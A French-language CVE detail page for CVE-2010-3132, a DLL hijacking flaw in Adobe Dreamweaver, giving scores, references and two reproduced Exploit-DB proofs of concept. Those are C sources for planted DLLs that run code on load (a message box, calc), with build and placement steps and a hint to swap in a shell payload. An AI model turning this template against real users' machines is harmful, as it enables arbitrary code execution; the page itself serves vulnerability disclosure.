CVE-2010-3132 : Détail

CVE-2010-3132

0.55%V3
Network
2010-08-26
16h00 +00:00
2017-09-18
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Untrusted search path vulnerability in Adobe Dreamweaver CS5 11.0 build 4916, build 4909, and probably other versions, allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse (1) mfc90loc.dll or (2) dwmapi.dll that is located in the same folder as a CSS, PHP, ASP, or other file that automatically launches Dreamweaver.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 14735

Date de publication : 2010-08-23 22h00 +00:00
Auteur : Glafkos Charalambous
EDB Vérifié : No

/* Exploit Title: Adobe Dreamweaver CS4 DLL Hijacking Exploit (ibfs32.dll) Date: August 25, 2010 Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com) Version: 10.0 Build 4117 Tested on: Windows 7 Ultimate x86 Vulnerable extensions: .asp .asa. aspx .php .php5 .cfm .tpl .asr .jsp (etc) Greetz: Astalavista, OffSEC, Exploit-DB */ #include <windows.h> #define DllExport __declspec (dllexport) BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { dll_hijack(); return 0; } int dll_hijack() { MessageBox(0, "Dreamweaver DLL Hijacking!", "DLL Message", MB_OK); return 0; }
Exploit Database EDB-ID : 14740

Date de publication : 2010-08-24 22h00 +00:00
Auteur : diwr
EDB Vérifié : No

/* # Exploit Title: Adobe Dreamweaver CS5 DLL Hijacking Exploit (mfc90loc.dll) # Date: 25/08/2010 # Author: Bruno Filipe (diwr) http://digitalacropolis.us # Software Link: http://www.adobe.com <http://www.bsplayer.org> # Version: <= 11.0 build 4909 # Tested on: WinXP SP2, WinXP SP3 # Other Adobe CS5 products may be vulnerable too. # Thx TheLeader ;) # ---------------------------------------------------------------------------------------------------------- # This should work with any file handled by Dreamweaver (.php, .asp, etc) # 1. gcc dllmain.c -o mfc90loc.dll # 2. Put mfc90ptb.dll in the same directory of a file handled by Dw (EG: anything.php) # 3. You can generate a msfpayload DLL and spawn a shell, for example. # ---------------------------------------------------------------------------------------------------------- */ #include <windows.h> int main() { WinExec("calc", SW_NORMAL); exit(0); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { main(); return 0; }

Products Mentioned

Configuraton 0

Adobe>>Dreamweaver >> Version 11.0

Références

http://www.vupen.com/english/advisories/2010/2171
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/41110
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.exploit-db.com/exploits/14740
Tags : exploit, x_refsource_EXPLOIT-DB